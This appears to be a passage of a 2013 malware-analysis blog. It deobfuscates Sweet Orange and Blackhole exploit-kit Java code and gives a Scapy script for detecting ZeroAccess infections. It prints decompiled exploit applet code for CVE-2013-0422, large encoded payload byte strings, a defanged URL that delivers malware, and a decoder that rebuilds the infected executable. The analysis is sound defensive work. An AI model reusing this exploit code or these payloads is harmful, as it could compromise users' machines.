value = "103sdj115sdj115sdj111sdj57sdj46sdj46sdj101sdj96sdj108sdj104sdj107sdj120sdj115sdj100sdj96sdj111sdj104sdj100sdj56sdj45sdj97sdj104sdj121sdj46sdj116sdj111sdj107sdj110sdj96sdj99sdj114sdj45sdj111sdj103sdj111sdj62sdj99sdj96sdj115sdj96sdj60sdj53sdj55sdj48sdj37sdj107sdj104sdj117sdj100sdj60sdj48sdj47sdj37sdj101sdj113sdj110sdj109sdj115sdj60sdj48sdj50sdj37sdj113sdj100sdj101sdj100sdj113sdj60sdj48sdj55sdj55sdj37sdj104sdj108sdj111sdj113sdj100sdj114sdj114sdj116sdj108sdj60sdj48sdj49sdj53sdj48sdj37sdj114sdj115sdj96sdj115sdj114sdj60sdj49sdj56sdj49sdj37sdj118sdj104sdj109sdj106sdj60sdj51sdj47sdj53sdj37sdj111sdj107sdj116sdj114sdj60sdj51sdj53sdj37sdj101sdj110sdj113sdj108sdj60sdj54sdj50sdj47"
    
name = "TvSRUWW"
value = "68sdj47sdj111sdj64sdj107sdj104sdj56sdj45sdj100sdj119sdj100"
    
name = "SyLIfT"
value =  "108sdj96sdj115sdj103"

Definately more SPAM, spam, spam, spam...

Well lets just make some more Python code to verify what they are up to here; decoding URL + evil save file. I put the strings in there for convenience.


#malforsec  Sweet ORange SPAM reduction, url and save file script
arrayOfString = [
  "103sdj115sdj115sdj111sdj57sdj46sdj46sdj101sdj96sdj108sdj104sdj107sdj120sdj115sdj100sdj96sdj111sdj104sdj100sdj56sdj45sdj97sdj104sdj121sdj46sdj116sdj111sdj107
sdj110sdj96sdj99sdj114sdj45sdj111sdj103sdj111sdj62sdj99sdj96sdj115sdj96sdj60sdj53sdj55sdj48sdj37sdj107sdj104sdj117sdj100sdj60sdj48sdj47sdj37sdj101sdj113sdj110s
dj109sdj115sdj60sdj48sdj50sdj37sdj113sdj100sdj101sdj100sdj113sdj60sdj48sdj55sdj55sdj37sdj104sdj108sdj111sdj113sdj100sdj114sdj114sdj116sdj108sdj60sdj48sdj49sdj5
3sdj48sdj37sdj114sdj115sdj96sdj115sdj114sdj60sdj49sdj56sdj49sdj37sdj118sdj104sdj109sdj106sdj60sdj51sdj47sdj53sdj37sdj111sdj107sdj116sdj114sdj60sdj51sdj53sdj37s
dj101sdj110sdj113sdj108sdj60sdj54sdj50sdj47",
  "68sdj47sdj111sdj64sdj107sdj104sdj56sdj45sdj100sdj119sdj100",
  "108sdj96sdj115sdj103"]

def makeStrOfInt(intArray):
  str1 = ""
  for i in range(0, len(intArray), 1):
    str1 += chr(int(intArray[i]) + 1)
  return str1

def makeURL(p1, p2):
  url = p1+"&"+p2+"="
  return url.replace('http:', 'hxxp: ')

def main():
  print "URL to exe: ",  makeURL(makeStrOfInt(arrayOfString[0].split('sdj')), makeStrOfInt(arrayOfString[2].split('sdj')))
  print 'Save exe: java.io.tmpdir\\', makeStrOfInt(arrayOfString[1].split('sdj')) 
  

if __name__ == "__main__":
    main()

And the output:

$ python so_url_decode.py 
URL to exe:  hxxp: //familyteapie9.biz/uploads.php?data=681&live=10&front=13&refer=188&impressum=1261&stats=292&wink=406&plus=46&form=730&math=
Save exe: java.io.tmpdir\ E0pAli9.exe

Note: There should be a random number between 0-979 at the end of the url. But as you saw in my last post -> probably not needed.

5c. Exe manipulation

As we saw from the code, the evil doers dont just fetch the exe. They throw in some XOR Vodoo, or at least  some XOR code to obfuscate what they are downloading.
Here is an example:



Here is the Java code used to fix it into an exe file(ParamString is the Key):

public static void seRQRYgMP(byte[] paramArrayOfByte, int paramInt, String paramString)
  {
    int i = 0;
    int j = 0;
    int k = 0;
    int m = 0;
    int n = 0;
    int i1 = 0;
    k = paramString.length();
    byte[] arrayOfByte = paramString.getBytes();
    i = 0;
    j = 0;
    while (i < paramInt)
    {
      n = Math.max(1, -932231);
      if (i % Math.max(2, -932231) == 0)
      {
        i1++;
        if (i1 == k)
        {
          i1 = 0;
          n = 0;
        }
      }
      if (paramArrayOfByte[i] == Math.max(0, -932231))
        n = 0;
      if (paramArrayOfByte[i] == arrayOfByte[j])
        n = 0;
      if (n == Math.max(1, -932231))
      {
        m = (byte)(paramArrayOfByte[i] ^ arrayOfByte[j]);
        paramArrayOfByte[i] = m;
      }
      if (j < k - Math.max(1, -932231))
        j++;
      else
        j = 0;
      i++;
    }
  }

  public htispD(OutputStream paramOutputStream, int paramInt)
  {
  }
}

Lets see if we can reproduce it in Python:

#@malforsec Sweet Orange exe deobfuscator
#Key is the parameter from the applet tag from the landing pane
key = "108sdj96sdj115sdj103"

def decodeH(paramString):
  str1 = ""
  for i1 in range(0, (len(paramString)/2), 1):
    str1 += str(chr(int(paramString[(i1*2):((i1*2)+2)], 16)))
  return str1

def makeStrOfInt(intArray):
  str1 = ""
  for i in range(0, len(intArray), 1):
    str1 += chr(int(intArray[i]) + 1)
  return str1

def main():
  keyarr = makeStrOfInt(key.split('sdj'))
  new_str = ""
  with open('so_exe_xored.txt', 'r') as f1:
    inf = f1.read()
    for i in range(0, len(inf), 1):
      if ord(inf[i]) == 0 or ord(inf[i]) == ord(keyarr[i%4]) or i%8 == 6:
        new_str += inf[i]
      else:
        new_str += chr(ord(inf[i]) ^ ord(keyarr[i%4]))
  with open('so_infected.exe', 'w') as fout:
    fout.write(new_str)


if __name__ == "__main__":
    main()

Did we get it right? lets see the start of the exe:

0000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
0000010: b800 0000 0000 0000 4000 0000 0000 0000  ........@.......
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 8000 0000  ................
0000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468  ........!..L.!Th
0000050: 6973 2070 726f 6772 616d 2063 616e 6e6f  is program canno
0000060: 7420 6265 2072 756e 2069 6e20 444f 5320  t be run in DOS 
0000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000  mode....$.......
0000080: 5045 0000 4c01 0400 8554 4c51 0000 0000  PE..L....TLQ....
0000090: 0000 0000 e000 0e01 0b01 0237 0016 0000  ...........7....
00000a0: 004c 0000 0000 0000 1912 0000 0010 0000  .L..............
00000b0: 0030 0000 0000 4000 0010 0000 0002 0000  .0....@.........
00000c0: 0100 0000 0000 0000 0400 0000 0000 0000  ................


Looks perfect to me :)

6. Epilogue

So we have been able to verify that the SO EK is using CVE-2013-0422 as the vector to gain illegal access to others computers. How they obfuscate the code to lure researcher and evade detection mechanisms. We have dissected the code and finally we have not only freshlt sqeezed Sweet Orange juice but we have jam to go with the bread as well.

exe:
MD5: f633b5214319acb48353576d12165d90
VT: 12/46

tarball of the Python code here

Happy Sweet Orange EK deobfuscation

Monday, March 18, 2013

Checking ZeroAccess with Python and Scapy


I see that there is still a lot of ZeroAccess infections from EK's around.
One should think that these bad guys should be somewhat satisfied with well over a million bots.
But not these guys, no they have to be the biggest and I guess they need to sustain their illegal income!

Check here for more info on ZeroAccess and network behaviour

Well enough ranting about the biggest botnet on the face of the earth.
Lets make our litte Python script,
with the help of the excellent tool Scapy we will make a script that can check if a remote host is infected with ZeroAccess.

Note the requirements: root access(we need promisc on the interface), scapy installed and python 2.7.3 of course.

run it with the remote ip as argument and it will shout the country where penguins come from back at you, BURMA, if the host is infected.

ZeroAccesed python script


# @malforsec python script to check ZeroAccess infected hosts
# requires scapy
# requires root privs
# usage: python zeroaccess_check.py <dest_ip>
# Why BURMA -> because penguins comes from Burma
from scapy.all import *


def main():
  dest_ip = sys.argv[1]
  ## alter port if you want a differnet source port
  src_port = 16464
  dst_port = 16464
  payload = '\xb8\x14\x35\xfe\x28\x94\x8d\xab\xc9\xc0\xd1\x99\x85\x95\x6f\x3f'

  pkt = sr1(IP(dst=dest_ip)/UDP(dport=dst_port, sport=src_port)/payload, timeout=10)
  ## if we get an anwer and it is not icmp(eg port unreachable)
  if pkt and pkt.proto != 1:
    if pkt.load.encode("hex")[8:16] == "28948dbe":
      print "\nBURMA!! : The host is ZerorAaccessed\n"
  else:
    print "Could not get ZeroAcess answer from host: ", dest_ip

if __name__ == "__main__":
    main()


Donload here: code.google.com

Please note that firewalls, routers and alike devices can block the traffic between you and the remote host. So use with intelligence :)

Should be OK to test internal networks. Even thoug it is slow. Set timeout wisely.

Test run


/tmp/zeroaccess$ sudo python zeroaccess_check.py xxx.yy.70.244
[sudo] password for malforsec: 
WARNING: No route found for IPv6 destination :: (no default route?)
Begin emission:
......Finished to send 1 packets.
.............*
Received 20 packets, got 1 answers, remaining 0 packets

BURMA!! : The host is ZerorAaccessed


Yupp that worked

If you find an infected host. Don't panic. It's not like something exploded, just another regular day.
Whatch this first youtube


Then disconnect the host and do a complete reinstall. I would not recommend trying to clean the mess up.

Happy ZeroAccess hunting

Wednesday, March 6, 2013

Having fun reversing BHEK2 Java archives using Python


Having fun reversing BHEK2 Java Archives


- And since I need to learn more Python(not Monty that is) I just thought I would throw in a couple of Python scripts for the deobfuscation.


A couple of days back I looked into fetching the exploit files from the BHEK2.

While doing that excersise I got a couple of JAR archives. Lets look at one of them(They are almost identical anyway).


Now lets look into how the java code for this EK is built and what it does.


Just a reminder: I'm NO Java FU master so terminology and correctness might be sloppy. But I hope that we can get the job done.

0.First thing first: Unzip the JAR archive.  


$unzip 9_3.jar
/EK/cinema/9_3_jar$ unzip 9_3.jar 
Archive:  9_3.jar
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
  inflating: hw.class                
  inflating: codehex.class           
  inflating: Impossible.class        
  inflating: RunnerGood.class        
  inflating: d.class                 
  inflating: Asd.class               
  inflating: test.class              
  inflating: test2.class



1. The Applet is where the adventure start, as that is whats called from the HTML code. 

Thats a class that extends java.lang.Applet. Since I have seen a couple of network traces of BHEK2 before I remember that to be hw.class.
To be able to read the source code of the class files we just unzipped, we need to reverse it from the Java byte code and back to readable source code.

showmycode.com is a nice tool for this! or if you prefer commandline: jad. Simpy "jad hw.class"

2. The applet - hw.class 

import java.applet.Applet;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

public class hw extends Applet
{

    public hw()
    {
    }

    public static String pah(String s)
    {
        return (new StringBuffer(s)).reverse().toString();
    }

    public static byte[] shy(String s)
    {
        byte abyte0[] = new byte[s.length() / 2];
        for(int i = 0; i < s.length(); i += 2)
        {
            byte byte0 = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
            abyte0[i / 2] = byte0;
        }

        return abyte0;
    }

    public static Object rue(String s, String s1, Object obj)
        throws ReflectiveOperationException
    {
        return test2.rue2(s, s1, obj, new Class[0], new Object[0]);
    }

    public void init()
    {
        try
        {
            Class class1 = RunnerGood.bug(pah((new StringBuilder(String.valueOf(RunnerGood.zz))).append("vaj.allizom.gro.n".concat("us")).toString()));
            Method method = codehex.lot(class1, "enter", true);
            Object obj = method.invoke(null, new Object[0]);
            Method method1 = codehex.lot(class1, "createClassLoader", false);
            Object obj1 = method1.invoke(obj, new Object[1]);
            byte abyte0[] = d.decodeH(test2.one());
            Class class2 = RunnerGood.bug(pah("redaoLssalCdetareneG.lanretn".concat("i.tpircsavaj.all".concat("izom.gro.nus"))));
            Method method2 = codehex.lot(class2, test2.dd, false);
            String str12 = d.get(this);
            if(str12.indexOf("::") == -1)
            {
                Class class3 = (Class)method2.invoke(obj1, new Object[] {
                    0, abyte0
                });
                Constructor localConstructor = class3.getConstructor(new Class[] {
                    java/lang/String
                });
                localConstructor.newInstance(new Object[] {
                    str12
                });
            } else
            {
                Class my_class = (Class)method2.invoke(obj1, new Object[] {
                    0, Asd.arrayOfByte2
                });
                my_class.newInstance();
                Method mmm = my_class.getMethod("r", new Class[] {
                    java/lang/String, java/lang/Class
                });
                float a = 0.0F;
                mmm.invoke(null, new Object[] {
                    str12, hw
                });
            }
        }
        catch(Exception e)
        {
            e.printStackTrace();
        }
    }

    public static String gouerpyftn(String paramString)
    {
        String str2;
        String str1 = Asd.getKkkk();
        str2 = "";
        for(int i = 0; i < paramString.length(); i++)
        {
            Object localObject = Character.valueOf(paramString.charAt(i));
            int j = str1.indexOf(localObject.toString());
            if(j != -1)
            {
                if(j != 0)
                {
                    localObject = Character.valueOf(str1.charAt(j - 1));
                    str2 = (new StringBuilder(String.valueOf(str2))).append(localObject.toString()).toString();
                } else
                {
                    localObject = Character.valueOf(str1.charAt(str1.length() - 1));
                    str2 = (new StringBuilder(String.valueOf(str2))).append(localObject.toString()).toString();
                }
            } else
            {
                localObject = Character.valueOf(paramString.charAt(i));
                str2 = (new StringBuilder(String.valueOf(str2))).append(localObject.toString()).toString();
            }
        }

        return str2;
        Exception exception;
        exception;
        return "";
    }
}

Links to the classes @ showmycode.com:

hw.class              
codehex.class        
Impossible.class      
RunnerGood.class      
d.class              
Asd.class            
test.class            
test2.class


To the fun stuff! Can we figure out what the bad guys are up to, even when they do not want us to.

3. init() is the start of an applet so here is where we have to start investigating.

Class class1 = RunnerGood.bug(pah((new StringBuilder(String.valueOf(RunnerGood.zz))).append("vaj.allizom.gro.n".concat("us")).toString()));


Here the last string is appended to the string zz from the class RunnerGood (public static String zz = "txetnoC.lanretni.tpircsa";) and then the method pah() is run with that string as input. pah() just reverses the string and we end up with "sun.org.mozilla.javascript.internal.Context"

That string is sent into the bug() method of class RunnerGood.
That method is trying to find a class. Note also that there are referenses to MbeanInstantiator which was the problem with one of the Java 0-Days in January: CVE-2013-0422. Excellent paper on that here, And as we can see that is the exact trick used.


Having fun yet? That was not so hard :)

Line 40: Method method = codehex.lot(class1, "enter", true);
returning a method based on the params given to it.

Line 41: instantiate obj.

The whole thing is repeated and obj1 is instantiated.

Line 44: looks like we are going to start with the strings
byte abyte0[] = d.decodeH(test2.one()); the bytearray abyte0 is set:

OK, a lot of strings to concatenate and process.

4. Making use of Python

Here is where I take some time to code som Python and came up with the script below. I just grepped for the strings, redirected them to a file and renamed them. Swapped concat with "+" and cleaned it up a bit. Then I implemented the methods/functions.

getKkkk()

gouerpyftn(paramString)

one()

decodeH(paramString)


# malforsec BHEK Java deobfuscation 0.9

#Key
def getKkkk():
  str1 = "b12gO6%oh3}lfs98^mYauL5{qiy)RKpk40(VXBrtW&DzCFA-JndU_eZwTNHc+7QMx*vIPSGE"
  return str1;

#Deobfuscate main
def gouerpyftn(paramString):
  str1 = getKkkk()
  str2 = ""
  for i in range (0, len(paramString), 1):  
    c = paramString[i]
    j = str1.find(c)
    if j != -1:
      if j != 0:
        str2 += str1[(j-1)]
      else:
        str2 += str1[len(str1)-1]
    else:
      str2 =+ paramString[i]
  return str2

def one():
  str1 = impossible_str17 + test_str114 + test_str116 + test_str119 + asd_str122 + asd_str123 + asd_str124 + asd_str125
  return str1

def decodeH(paramString):
  str1 = ""
  for i1 in range(0, (len(paramString)/2), 1):
# Lets shorten the code a bit here and drop the codehex.ttt call
#    arrayOfByte[i1] = codehex.ttt(paramString, i1);
    str1 += str(chr(int(paramString[(i1*2):((i1*2)+2)], 16)))
  return str1

test2_str1 = "F-Abr-rb((((((}g((Ar(-(((8((0r(8((}}((0F(^((0z(-"
test2_str2 = "(((%((0b(^((0A(Q(({((^(({2(-(((%(({g(Q(({"
test2_str3 = "}(-(({0(({{(Q(({%(-(({Q(({^(Q(({8(-(((z((0r(}("
test2_str4 = "((A0g0((}((Q-2g(((-(((z(({-(Q(({r(-((2g((0r"
test2_str5 = "(-((2g(({F(^(({z(-((2g(({b(-((2g(({A(^((%((-(({Q("
test2_str6 = "(%2(^((%g(-((gF(({A(Q((%}(-((2F((%0(-((2F((%{(-((%%((%"
test2_str7 = "Q(^((%^(-((%%((%8(^((%-(-((gF((%r(^((%F(Q((%z(-((g{((%0(-((%"
test2_str8 = "b((%A(-((g{((Q((-((%b((Q2(-((g{((Q2(-((Qg((Q}(Q((Q0(^(("
test2_str9 = "Q{(^((Q%(^((QQ(^((Q^(-((Qg((Q8(-(({Q((Q-(Q((Qr(Q((QF(2"
test2_str10 = "(((2%2(2((2g0F%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%b%Q}r(2(((%}F"
test2_str11 = "%8%b%8Q0}b(2((2{g^0F%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%"
test2_str12 = "b%Q}rg8{%(2(((00}%A%0%{(2(((A0F%8%b%{0bQ{%z%g%{Qg{"
test2_str13 = "0%2%g%F%{(2(((z{}Q0%2%}%r0z%2Q({0%2%g%F%{(Q((Qr(Q(("
test2_str14 = "Q0(Q(({%(2(((}QgQ{%b(2((20g^g80F%-%2Q%%2gA%F%2%b%QgA0A%g%"
test2_str15 = "-%{%}Q0}r(Q(({8(Q((%}(Q((Qz(Q((Qb(Q((%z(Q((QA(Q((^((2(((-0"
test2_str16 = "{Q^%}%{Q(Q0%8%A%bQ}(2(((-{}%AQ{Qg%"

impossible_str17 = gouerpyftn(test2_str1 + test2_str2 + test2_str3 + test2_str4 + test2_str5 + test2_str6 + test2_str7 + test2_str8 + test2_str9 + test2_str10 + test2_str11 + test2_str12 + test2_str13 + test2_str14 + test2_str15 + test2_str16)

impossible_str27 = "}%{0%%8%F%{(2(((F%-%2Q%%2{gQ{%bgb%-%2Q%%"
impossible_str28 = "2(F((}Q((^2(F((}{((}%(2((2Agz%A%}2gQr}0%rQ%(%gQgbQ-%F{z20g"
impossible_str29 = "0%zQ(F(^(g%(0%2Qr(QgQg^%gQ82%gQ(F((^g((^}(2(((Fg}%20{(2}F}"
impossible_str30 = "2%QQ82%}ggg%-(2(((A%-%2Q%%2gA%F%2%b%QgA0}%F%2Q}Q}("
impossible_str31 = "2((gQgz%A%}2gQr}0%rQ%(%gQgbQ-%F{z({}{%Q%}2-}8gg%8Q(2Q2"
impossible_str32 = "(}A%zQ((}g2gb%2Qr}g}%}}%QQ-2z(F((^0((^{(2("
impossible_str33 = "(2(%-%2Q%%2gA%F%2%b%QgA0A%g%-%{%}Q0(Q((^%(F((^Q((^^("
impossible_str34 = "2((2}%-%2Q%%2gA%F%2%b%QgA0{Q^%}%{Q(Q0%8%A%"
impossible_str35 = "b(Q((^8(F((^-((^r(2((2(%-%2Q%%2gAQ{Q0%8%FgA{g%2%b%0%A%z"
impossible_str36 = "(F((^F((^z(2((2Q%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%b%Q"
impossible_str37 = "0gQ{%8%F%0%{Qg(F((^b((^A(2(((0%8%r%z2%(F(("
impossible_str38 = "^b((8((F((82((8g(2(((8}gQzQ((2QrgA%2Q^2%(F((8"
impossible_str39 = "}((80(2(((2gA(2(((F%-%2Q%%2gA%b%{Q0gA{{{g"
impossible_str40 = "0F(F((}Q((}^(F((8{((8%(Q((Qz(F((8Q((8^(2((20(0%2Qr(Q}(g8Q-}^"
impossible_str41 = "}Q}F}0QbQ-F(^(}F}}%QQ-2z(F((88((80(2(((0%8Q-Q^(}(F("
impossible_str42 = "(8-((8r(2(((0%8%-Q82A(2((2^%-%2Q%%2gA%8%AgA0%%8%F%{0A"
impossible_str43 = "Q{Q0Q(Q{Q0{}Q0Qg%{%2%z(Q((Qb(F((8F((8z(F((8b(("
impossible_str44 = "8A(F((-(((^2(Q((^((F((-2((-g(2((2(%-%2Q%%"
impossible_str45 = "2gA%F%2%b%QgA{}Q0Qg%8%b%Q(2(((Qg0%}Q2{z}(}A%r"
impossible_str46 = "(2(((g%^0z(2(((8}{%rQgF(^(g}}{}zgQ(2(((g%-Qz(F((-}((-"
impossible_str47 = "0(F((-{((-%(2(((Q%-%2Q%%2{gQ{%b(2((gQ%-%2Q"
impossible_str48 = "%%2gAQ}%{%}Q{Qg%8Q0Q8gA{(Qg%8Q%%8%F%{%Q%{"
impossible_str49 = "{Q^%}%{Q(Q0%8%A%b02%}Q0%8%A%b(2((2%%-%2Q%%2gA%b%{Q0"
impossible_str50 = "gA{{{g0F0}%A%b%b%{%}Q0%8%A%b(2((2}%-%2Q%%2"

test_str114 = gouerpyftn(impossible_str27 + impossible_str28 + impossible_str29 + impossible_str30 + impossible_str31 + impossible_str32 + impossible_str33 + impossible_str34 + impossible_str35 + impossible_str36 + impossible_str37 + impossible_str38 + impossible_str39 + impossible_str40 + impossible_str41 + impossible_str42 + impossible_str43 + impossible_str44 + impossible_str45 + impossible_str46 + impossible_str47 + impossible_str48 + impossible_str49 + impossible_str50)

impossible_str54 = "gA%8%AgA08%bQ(Q{Q0{}Q0Qg%{%2%z(2(((g{r0g(2((22%-%2"
impossible_str55 = "Q%%2gA%F%2%b%QgA{gQ{%bQ0%8%z%{(2(((}g^g8{%(2"
impossible_str56 = "(((Q%%%AQg0b%2%z%{(2((g{g^0F%-%2Q%%2gA%F%2%b%Qg"
impossible_str57 = "A{}Q0Qg%8%b%Q}rg80F%-%2Q%%2gA%F%2%b%QgA0}%F%2Q}Q}}r(2(((8%"
impossible_str58 = "Q%{Q00z%{Q0%^%A%0(2((0(g^0F%-%2Q%%2gA%F%2%b%QgA{"
impossible_str59 = "}Q0Qg%8%b%Q}r{r0F%-%2Q%%2gA%F%2%b%QgA0}%F%2Q}Q}}"
impossible_str60 = "rg80F%-%2Q%%2gA%F%2%b%QgAQg%{%%%F%{%}Q0gA0z%{Q0%^%A%0"
impossible_str61 = "}r(2((2^%-%2Q%%2gA%F%2%b%QgAQg%{%%%F%{%}Q0gA0z%"
impossible_str62 = "{Q0%^%A%0(2(((%%8%bQ%%A%r%{(2((}8g^0F%-%2Q%%2g"
impossible_str63 = "A%F%2%b%QgA0A%g%-%{%}Q0}r{r0F%-%2Q%%2gA%F%2%b%QgA0A%g%-%{%}Q"
impossible_str64 = "0}rg80F%-%2Q%%2gA%F%2%b%QgA0A%g%-%{%}Q0}r("
impossible_str65 = "2((2(%-%2Q%%2gA%F%2%b%QgA{}Q8Q}Q0%{%z(2((2gQ}%"
impossible_str66 = "{Q0{}%{%}Q{Qg%8Q0Q80z%2%b%2%Q%{Qg(2((2bg^0F%-%2Q%%2gA%F%2%b%"
impossible_str67 = "QgA{}%{%}Q{Qg%8Q0Q80z%2%b%2%Q%{Qg}rg8{%(2(((Q%b%{Q^Q008%bQ"
impossible_str68 = "0(2(((0g^08g808(2(((%%2Q(Q(%{%b%0(2((2Fg^08g80F%-%2Q%%2g"
impossible_str69 = "A%F%2%b%QgA{}Q0Qg%8%b%Q0gQ{%8%F%0%{Qg}r(2((gzg^0F%-%2Q"
impossible_str70 = "%%2gA%F%2%b%QgA{}Q0Qg%8%b%Q}rg80F%-%2Q%%2gA%F%2"
impossible_str71 = "%b%QgA{}Q0Qg%8%b%Q0gQ{%8%F%0%{Qg}r(2(((^Q0%A{}Q0Q"
impossible_str72 = "g%8%b%Q(2((20g^g80F%-%2Q%%2gA%F%2%b%QgA{"
impossible_str73 = "}Q0Qg%8%b%Q}r(2(((r%Q%{Q0{(Qg%AQ(%{QgQ0Q"
impossible_str74 = "8(2((g%g^0F%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%b"
impossible_str75 = "%Q}rg80F%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%b%Q}r(2(((b%A"
impossible_str76 = "Q(%{%b0}%A%b%b%{%}Q0%8%A%b(2((2-g^g80F%-%2Q"
impossible_str77 = "%%2gA%b%{Q0gA{{{g"

test_str116 = gouerpyftn(impossible_str54 + impossible_str55 + impossible_str56 + impossible_str57 + impossible_str58 + impossible_str59 + impossible_str60 + impossible_str61 + impossible_str62 + impossible_str63 + impossible_str64 + impossible_str65 + impossible_str66 + impossible_str67 + impossible_str68 + impossible_str69 + impossible_str70 + impossible_str71 + impossible_str72 + impossible_str73 + impossible_str74 + impossible_str75 + impossible_str76 + impossible_str77)

impossible_str78 = "4C436F6E6E656374696F6E3B01000E676574496E707574"
impossible_str79 = "53747265616D01001728294C6A6176612F696F2F496E707574537472656"
impossible_str80 = "16D3B01000E6765744865616465724669656C6401000769"
impossible_str81 = "6E6465784F66010015284C6A6176612F6C616E672F537472696E67"
impossible_str82 = "3B294901000472656164010007285B42494929490100"
impossible_str83 = "057772697465010007285B4249492956010005636C6F736501000A6"
impossible_str84 = "7657452756E74696D6501001528294C6A6176612F6C616E672F5"
impossible_str85 = "2756E74696D653B01000465786563010028285B4C6A61766"
impossible_str86 = "12F6C616E672F537472696E673B294C6A6176612F6C616"
impossible_str87 = "E672F50726F636573733B010004657869740100042849295"
impossible_str88 = "60100095A4B4D352E342E3561010001620100015A01000163"
impossible_str89 = "0C00AA00A909003300AB0100017A0100135B4C6A6176612F6C616E672F53"
impossible_str90 = "7472696E673B0100083C636C696E69743E0C00B100B201000B7"
impossible_str91 = "46F43686172417272617901000428295B430A002C0"
impossible_str92 = "0B00C003700B5010005285B4329560A002C00B40C0"
impossible_str93 = "0B80092010006696E7465726E0A002C00B70C00AD00AE0900"
impossible_str94 = "3300BA0700BD0100146A6176612F696F2F53657269616C697A6162"

test_str95 = "6C650700AE0700AE0700AE0700AE0700AE0700AE0700AE0"
test_str96 = "700AE0700AE0700AE0700AE0700AE0700AE0700AE070"
test_str97 = "0AE0700AE0700AE0700AE0700AE0700AE0700AE0700AE0700AE07"
test_str98 = "00AE0700AE0700AE0700AE0700AE0700DB0100025B430700AE0700AE070"
test_str99 = "0DB0700DB0700AE0700AE0700DB0700DB0700AE0700AE0700DB0"
test_str100 = "700DB0700AE0700AE0700DB0700DB0700AE0700AE0700DB0700D"
test_str101 = "B0700AE0700AE0700DB0700DB0700AE0700AE0700DB0700DB0700"
test_str102 = "AE0700AE0700DB002100330009000100340004000"
test_str103 = "0003500360000000900A800A90000000900AA00A900000"
test_str104 = "01A00AD00AE00000003000100370038000100390000008A00070003"
test_str105 = "000000412AB700012A2BB50002B200BB0332B80004B200BB053204BD0006"
test_str106 = "5903B200BB0432B8000453B60008B200BB0332B8000404"
test_str107 = "BD000959032A53B6000A57A700044DB100010009003C003F0"
test_str108 = "00B0002003A000000160005000000250004000E00090"
test_str109 = "00B003C002700400006003B000000130002FF003F0002070033070"
test_str110 = "02C000107000B000001003F0040000200390000047"
test_str111 = "30008001100000223B200AC361001B8000CBB000D59B7000E4C"
test_str112 = "120F2B1210B60011603D"

test_str119 = impossible_str78 + impossible_str79 + impossible_str80 + impossible_str81 + impossible_str82 + impossible_str83 + impossible_str84 + impossible_str85 + impossible_str86 + impossible_str87 + impossible_str88 + impossible_str89 + impossible_str90 + impossible_str91 + impossible_str92 + impossible_str93 + impossible_str94 + test_str95 + test_str96 + test_str97 + test_str98 + test_str99 + test_str100 + test_str101 + test_str102 + test_str103 + test_str104 + test_str105 + test_str106 + test_str107 + test_str108 + test_str109 + test_str110 + test_str111 + test_str112

asd_str122 = "ZZ001259Z700131CZ60014Z200ZZ100632Z60016Z600174EZZ001259Z70013Z200ZZ0732Z80019Z60016121AZ60016Z600173A04ZZ001259Z700132AZ40002Z6001ZZ600161CZ60014Z600173A05ZZ001C591905Z7001D3A061906Z6001E3A071907Z6001F3A080336091907Z200ZZ100A32Z600213A0A190A15109A000CC60058A70004ZF190AZ200ZZ100932Z6002315109A002Z02A00022A70004ZF190AZ200ZZ0632Z6002315109A0014A70004ZF029F0025A70004ZF04A70004ZF3609ZZ001259Z700131CZ60014Z200ZZ0632Z60016Z600174EZZ002559ZZ001259Z700131904Z600162DZ60016Z".replace("Z", "B")
asd_str123 = "60017B700263A0B110400BC083A0D1C360E1908190D03190DBEB6002759360C029F005115109A005603360F150F150CA20033150E1100AA601100FF7E360E150E104882360E190D150F5C33150E91829154840F0115109A0016151099FFD0A70004BF190B190D03150CB60028151099FFA31908B60029190BB6002AB8002B3A0F15109A00531509990053A70004BF190F08BD002C5903B200BB100732535904B200BB0832535905B200BB100B32535906B200BB100832535907BB001259B700131904B600162DB60016B6001753B6003157A70004BF1510990038190F06BD002C5903B200BB100732535904B200BB0832535905BB001259B700131904B600162DB60016B6001753B6003157A70004BF03B80032A700084C03B8003201B0000A01DB02110214000B018D01D701DA000B018601900193000B014B01640167000B00CC00D400D7000B00BA00CF00D2000B00B100C700CA000B00A200B400B7000B0092009C009F000B00050219021C000B0002003A0000009200240005001A0009002800110016001B001100330005004F00120069001800740010007B0013008200150085000F0092001E00A0002600D3001B00DA002400F10022010D000A0"
asd_str124 = "114001401170004012900170138000C0144001D014B0021015700290168002001770019017C00090181001C0186001F0194000D01E000010215000302190002021C0007021D000802210023003B00000156001CFF009F001107003307000D0107002C07002C07002C07001C0700430700440107002C000000000001000107000B004107002C5407000B005107000B40014607000B004307000B400118FF0025001107003307000D0107002C07002C07002C07001C0700430700440107002C070025000700460100010000FF0019001107003307000D0107002C07002C07002C07001C0700430700440107002C0700250107004601010100007507000B0009FF0004001107003307000D0107002C07002C07002C07001C0700430700440107002C07002501070046010001000009FF0011001107003307000D0107002C07002C07002C07001C0700430700440107002C070025010700460107004701000107000B00F7004507000B00047307000B00FF0006001107003300000000000000000000000000000001000107000BFF000400110700330700BC00000000000000000000000000000100000048000000040001000B000800AF00810001003900000305000C00010000012D100CBD002C5903120310FFA70078535904120703A7006F535905120504A70066535906122405A7005D535907121806A70054535908122E07A7004B53591006121508A7004153591007122D1006A700365359100812301007A7002B5359100912221008A700205359100A12201009A700155359100B122F100AA7000A53B300BBA700AC5FB600B359BE5F033B5F5A04A3004F591A5C341A0870AA00000000003300000000000000030000001F00000024000000290000002E1047A70014100EA7000F1015A7000A1073A7000510558292558400015F5A9A00085C5FA7FFB95F5A1AA3FFB1BB002C5A5FB700B6B600B95F575FAA00FFFFFF1C000000000000000AFFFFFF25FFFFFF2EFFFFFF37FFFFFF40FFFFFF49FFFFFF53FFFFFF5EFFFFFF69FFFFFF74FFFFFF7FFFFFFF8AB100000001003B000001C60017FF000E00010100040700BE0700BF0107002CFF000800010100040700C00700C10107002CFF000800010100040700C20700C30107002CFF000800010100040700C40700C50107002CFF000800010100040700C